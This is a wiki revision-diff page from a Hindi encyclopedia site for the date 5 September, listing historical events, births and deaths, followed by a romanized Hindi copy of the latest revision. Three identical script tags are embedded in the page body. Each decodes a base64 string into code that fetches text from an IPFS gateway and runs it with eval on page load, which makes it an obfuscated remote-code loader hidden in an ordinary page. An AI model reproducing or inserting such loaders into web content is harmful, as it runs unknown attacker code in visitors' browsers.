Difference between revisions of "5 सितंबर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(9 intermediate revisions by 3 users not shown)
Line 4: Line 4:
  
 
==5 सितंबर की महत्त्वपूर्ण घटनाएँ==
 
==5 सितंबर की महत्त्वपूर्ण घटनाएँ==
* 1666 - लंदन में लगी भीषण आग में 13,200 घर क्षतिग्रस्त हो गये और आठ लोगों की मौत हो गयी।
+
* 1666 - [[लंदन]] में लगी भीषण आग में 13,200 घर क्षतिग्रस्त हो गये और आठ लोगों की मौत हो गयी।
* 1798 - [[फ्रांस]] में अनिवार्य सैन्य सेवा कानून प्रभाव में आया।
+
* [[1798]] - [[फ्रांस]] में अनिवार्य सैन्य सेवा कानून प्रभाव में आया।
* 1836 - सैम ह्यूस्टन टेक्सास गणराज्य के राष्ट्रपति निर्वाचित।
+
* [[1836]] - सैम ह्यूस्टन टेक्सास गणराज्य के राष्ट्रपति निर्वाचित।
* 1839 - चीन में पहला अफ़ीम युद्ध शुरू हुआ।
+
* [[1839]] - [[चीन]] में पहला अफ़ीम युद्ध शुरू हुआ।
* [[1914]] - [[ब्रिटेन]], [[फ्रांस]], बेल्जियम और [[रूस]] के बीच [[लंदन]] समझौता हुआ।
+
* [[1914]] - [[ब्रिटेन]], [[फ्रांस]], बेल्जियम और [[रूस]] के बीच लंदन समझौता हुआ।
 
* [[1944]] - ब्रिटिश प्रधानमंत्री विंस्टन चर्चिल ने अपनी स्कॉटलैंड यात्रा शुरू की।
 
* [[1944]] - ब्रिटिश प्रधानमंत्री विंस्टन चर्चिल ने अपनी स्कॉटलैंड यात्रा शुरू की।
 
* [[1972]] - म्यूनिख ओलंपिक के दौरान फिलीस्तीनी समूह ब्लैक सितम्बर ने 11 इजरायली एथलीटों को बंधक बना लिया और बाद में उनकी हत्या कर दी।
 
* [[1972]] - म्यूनिख ओलंपिक के दौरान फिलीस्तीनी समूह ब्लैक सितम्बर ने 11 इजरायली एथलीटों को बंधक बना लिया और बाद में उनकी हत्या कर दी।
* [[1975]] - पुर्तगाल के प्रधानमंत्री गोंसालवेज़ ने अपने पद से इस्तीफा दिया।
+
* [[1975]] - [[पुर्तग़ाल]] के प्रधानमंत्री गोंसालवेज़ ने अपने पद से इस्तीफा दिया।
* [[1987]] - [[अमेरिका]] के टेनिस खिलाड़ी जॉन मैकनरॉय पर उनके बयान के लिये 17,500 डॉलर का जुर्माना ठोका गया।
+
* [[1987]] - [[अमेरिका]] के [[टेनिस]] खिलाड़ी जॉन मैकनरॉय पर उनके बयान के लिये 17,500 डॉलर का जुर्माना ठोका गया।
* [[1991]] - नेल्सन मंडेला अफ्रीकी नेशनल कांग्रेस के अध्यक्ष चुने गये।
+
* [[1991]] - [[नेल्सन मंडेला]] अफ्रीकी नेशनल कांग्रेस के अध्यक्ष चुने गये।
* [[1997]] - अंतर्राष्ट्रीय ओलम्पिक समिति ने सन् 2004 में होने वाले ग्रीष्म ओलम्पिक खेलों का आयोजन एथेन्स में कराने का निश्चय किया।  
+
* [[1997]] - अंतर्राष्ट्रीय ओलम्पिक समिति ने सन [[2004]] में होने वाले ग्रीष्म ओलम्पिक खेलों का आयोजन एथेन्स में कराने का निश्चय किया।  
* [[1999]] - वाई नदी समझौते को कार्यान्वित करने तथा रुकी हुई पश्चिमी एशिया शांति वार्ता को आगे बढ़ाने हेतु इस्रायल के प्रधानमंत्री एहुद बराक तथा यासिर अराफ़ात के मध्य शर्म अल शेख़ (मिस्र) में शांति समझौते पर हस्ताक्षर।  
+
* [[1999]] - वाई नदी समझौते को कार्यान्वित करने तथा रुकी हुई पश्चिमी एशिया शांति वार्ता को आगे बढ़ाने हेतु इस्रायल के प्रधानमंत्री एहुद बराक तथा यासिर अराफ़ात के मध्य शर्म अल शेख़ ([[मिस्र]]) में शांति समझौते पर हस्ताक्षर।  
* [[2000]] - नील्जिमालम्बा रूस में अंतर्राष्ट्रीय महिला संगठन की अध्यक्ष नियुक्त, वे इस पद को सुशोभित करने वाली पहली एशियाई महिला हैं।
+
* [[2000]] - नील्जिमालम्बा, [[रूस]] में अंतर्राष्ट्रीय महिला संगठन की अध्यक्ष नियुक्त, वे इस पद को सुशोभित करने वाली पहली एशियाई महिला रहीं।
 
* [[2001]] - फिजी में महेन्द्र चौधरी, जार्ज स्पेट और लाइसेनिया करासे संसद हेतु चुने गये।  
 
* [[2001]] - फिजी में महेन्द्र चौधरी, जार्ज स्पेट और लाइसेनिया करासे संसद हेतु चुने गये।  
* [[2002]] - अफ़ग़ानिस्तान के राष्ट्रपति हामिद करजई पर जानलेवा हमला, पर वे सुरक्षित रहे।  
+
* [[2002]] - [[अफ़ग़ानिस्तान]] के राष्ट्रपति हामिद करजई पर जानलेवा हमला, पर वे सुरक्षित रहे।  
 
* [[2005]] - मंडला एयरलाइंस का विमान 091 इंडोनेशिया में सुमात्रा के एक आवासीय क्षेत्र में दुर्घटनाग्रस्त हो गया जिससे उसमें सवार 104 लोगों के अलावा आवासीय क्षेत्र के 39 लोगों की मौत हो गई।
 
* [[2005]] - मंडला एयरलाइंस का विमान 091 इंडोनेशिया में सुमात्रा के एक आवासीय क्षेत्र में दुर्घटनाग्रस्त हो गया जिससे उसमें सवार 104 लोगों के अलावा आवासीय क्षेत्र के 39 लोगों की मौत हो गई।
* [[2008]]- [[रतन टाटा]] के नेतृत्व में सोसायटी ऑफ़ इण्डियन ऑटोमोबाइल मैन्यूफैक्चरर्स (सियाम) के प्रतिनिधिमण्डल ने प्रधानमंत्री [[मनमोहन सिंह]] को भेंट की।
+
* [[2008]]- [[रतन टाटा]] के नेतृत्व में सोसायटी ऑफ़ इण्डियन ऑटोमोबाइल मैन्यूफैक्चरर्स (सियाम) के प्रतिनिधिमण्डल ने [[प्रधानमंत्री]] [[मनमोहन सिंह]] को भेंट की।
 
* [[2009]]- नेशनल स्टॉक एक्सचेंज ने दस कम्पनियों पर शेयर बाज़ार में क़ारोबार करने पर प्रतिबंध लगाया।  
 
* [[2009]]- नेशनल स्टॉक एक्सचेंज ने दस कम्पनियों पर शेयर बाज़ार में क़ारोबार करने पर प्रतिबंध लगाया।  
* [[2014]] - विश्व स्वास्थ्य संगठन के एक अनुमान के मुताबिक, गिनी, लाइबेरिया, नाइजीरिया, सेनेगल और सिएरा लियोन में इबाेला वायरस से संक्रमित 3500 लोगों में से 1900 लोगों की मौत हो गयी।
+
* [[2014]] - [[विश्व स्वास्थ्य संगठन]] के एक अनुमान के मुताबिक़, गिनी, लाइबेरिया, नाइजीरिया, सेनेगल और सिएरा लियोन में इबाेला वायरस से संक्रमित 3500 लोगों में से 1900 लोगों की मौत हो गयी।
 +
 
 
==5 सितंबर को जन्मे व्यक्ति==
 
==5 सितंबर को जन्मे व्यक्ति==
* [[1872]] - [[चिदंबरम पिल्लई]] - [[तमिल भाषा]] के विद्वान और प्रख्यात समाज-सुधारक।
+
* [[1993]] - [[अजीत सिंह यादव]] - भाला फेंक के भारतीय पैरा एथलीट हैं।
* [[1888]] - [[सर्वपल्ली राधाकृष्णन]] -[[भारत]] के दूसरे [[राष्ट्रपति]]
+
* [[1986]] - प्रज्ञान ओझा - भारतीय क्रिकेटर हैं।
 +
* [[1958]] - [[के. के. अग्रवाल]] - भारतीय चिकित्सक और हृदय रोग विशेषज्ञ थे।
 +
* [[1938]] - [[अमृत तिवारी]] - भारतीय दंत चिकित्सक थीं।
 +
* [[1933]] - [[लक्ष्मीनारायण रामदास]] - अंतरराष्ट्रीय स्तर पर शांति स्थापित करने के लिए '[[रेमन मैग्सेसे पुरस्कार]]' पाने वाले भारतीय।
 +
* [[1910]] - फ़िरोज़ पलिया - भारतीय क्रिकेटर थे।
 
* [[1905]] - [[वाचस्पति पाठक]] - प्रसिद्ध [[उपन्यासकार]]।
 
* [[1905]] - [[वाचस्पति पाठक]] - प्रसिद्ध [[उपन्यासकार]]।
* [[1910]] - फ़िरोज़ पलिया, भारतीय क्रिकेटर
+
* [[1888]] - [[सर्वपल्ली राधाकृष्णन]] -[[भारत]] के दूसरे [[राष्ट्रपति]]।
* [[1986]] - प्रज्ञान ओझा, भारतीय क्रिकेटर
+
* [[1872]] - [[चिदंबरम पिल्लई]] - [[तमिल भाषा]] के विद्वान् और प्रख्यात समाज-सुधारक।
 +
 
 
==5 सितंबर को हुए निधन==
 
==5 सितंबर को हुए निधन==
 +
* [[1997]] - [[मदर टेरेसा]] - विश्व प्रसिद्ध समाज सेविका हैं।
 +
* [[1995]] - [[सलिल चौधरी]] - [[हिन्दी]] फ़िल्मों के प्रसिद्ध भारतीय संगीतकार थे।
 +
* [[1988]] - [[आर. डी. भण्डारे]] - भारतीय राजनीतिज्ञ, न्यायविद और अम्बेडकरवादी कार्यकर्ता थे।
 +
* [[1986]] - [[नीरजा भनोट]] - [[अशोक चक्र (पदक)|अशोक चक्र]] विजेता विमान परिचारिका थीं।
 
* [[1986]] - [[अम्बिका प्रसाद दिव्य]] - [[भारत]] के जाने-माने शिक्षाविद और [[हिन्दी]] साहित्यकार।
 
* [[1986]] - [[अम्बिका प्रसाद दिव्य]] - [[भारत]] के जाने-माने शिक्षाविद और [[हिन्दी]] साहित्यकार।
*[[1991]] - [[शरद जोशी]], भारतीय, व्यंग्य रचनाकार
+
* [[1991]] - [[शरद जोशी]] - भारतीय, व्यंग्य रचनाकार।
* [[1995]] - [[सलिल चौधरी]] - [[हिन्दी]] फ़िल्मों के प्रसिद्ध भारतीय संगीतकार।
+
* [[1918]] - [[रतनजी टाटा]] - 'टाटा समूह' को खड़ा करने वाले चार लोगों में से एक थे।
*[[1997]] - [[मदर टेरेसा]], विश्व प्रसिद्ध समाज सेविका
 
* [[1986]] - [[नीरजा भनोट]], [[अशोक चक्र (पदक)|अशोक चक्र]] विजेता विमान परिचारिका
 
  
 
==5 सितंबर के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==5 सितंबर के महत्त्वपूर्ण अवसर एवं उत्सव==

Latest revision as of 10:44, 24 January 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 5 sitanbar varsh ka 248 vaan (lip varsh mean yah 249 vaan) din hai. sal mean abhi aur 117 din shesh haian.

5 sitanbar ki mahattvapoorn ghatanaean

  • 1666 - landan mean lagi bhishan ag mean 13,200 ghar kshatigrast ho gaye aur ath logoan ki maut ho gayi.
  • 1798 - phraans mean anivary sainy seva kanoon prabhav mean aya.
  • 1836 - saim hyoostan teksas ganarajy ke rashtrapati nirvachit.
  • 1839 - chin mean pahala afim yuddh shuroo hua.
  • 1914 - briten, phraans, beljiyam aur roos ke bich landan samajhauta hua.
  • 1944 - british pradhanamantri vianstan charchil ne apani sk aautalaiand yatra shuroo ki.
  • 1972 - myoonikh olanpik ke dauran philistini samooh blaik sitambar ne 11 ijarayali ethalitoan ko bandhak bana liya aur bad mean unaki hatya kar di.
  • 1975 - purtagal ke pradhanamantri goansalavez ne apane pad se istipha diya.
  • 1987 - amerika ke tenis khila di j aaun maikanar aauy par unake bayan ke liye 17,500 d aaular ka jurmana thoka gaya.
  • 1991 - nelsan mandela aphriki neshanal kaangres ke adhyaksh chune gaye.
  • 1997 - aantarrashtriy olampik samiti ne san 2004 mean hone vale grishm olampik kheloan ka ayojan ethens mean karane ka nishchay kiya.
  • 1999 - vaee nadi samajhaute ko karyanvit karane tatha ruki huee pashchimi eshiya shaanti varta ko age badhane hetu israyal ke pradhanamantri ehud barak tatha yasir arafat ke madhy sharm al shekh (misr) mean shaanti samajhaute par hastakshar.
  • 2000 - niljimalamba, roos mean aantarrashtriy mahila sangathan ki adhyaksh niyukt, ve is pad ko sushobhit karane vali pahali eshiyaee mahila rahian.
  • 2001 - phiji mean mahendr chaudhari, jarj spet aur laiseniya karase sansad hetu chune gaye.
  • 2002 - afaganistan ke rashtrapati hamid karajee par janaleva hamala, par ve surakshit rahe.
  • 2005 - mandala eyaralaians ka viman 091 iandoneshiya mean sumatra ke ek avasiy kshetr mean durghatanagrast ho gaya jisase usamean savar 104 logoan ke alava avasiy kshetr ke 39 logoan ki maut ho gee.
  • 2008- ratan tata ke netritv mean sosayati aauf indiyan aautomobail mainyoophaikcharars (siyam) ke pratinidhimandal ne pradhanamantri manamohan sianh ko bheant ki.
  • 2009- neshanal st aauk eksacheanj ne das kampaniyoan par sheyar bazar mean qarobar karane par pratibandh lagaya.
  • 2014 - vishv svasthy sangathan ke ek anuman ke mutabiq, gini, laiberiya, naijiriya, senegal aur siera liyon mean ibaela vayaras se sankramit 3500 logoan mean se 1900 logoan ki maut ho gayi.

5 sitanbar ko janme vyakti

5 sitanbar ko hue nidhan

5 sitanbar ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>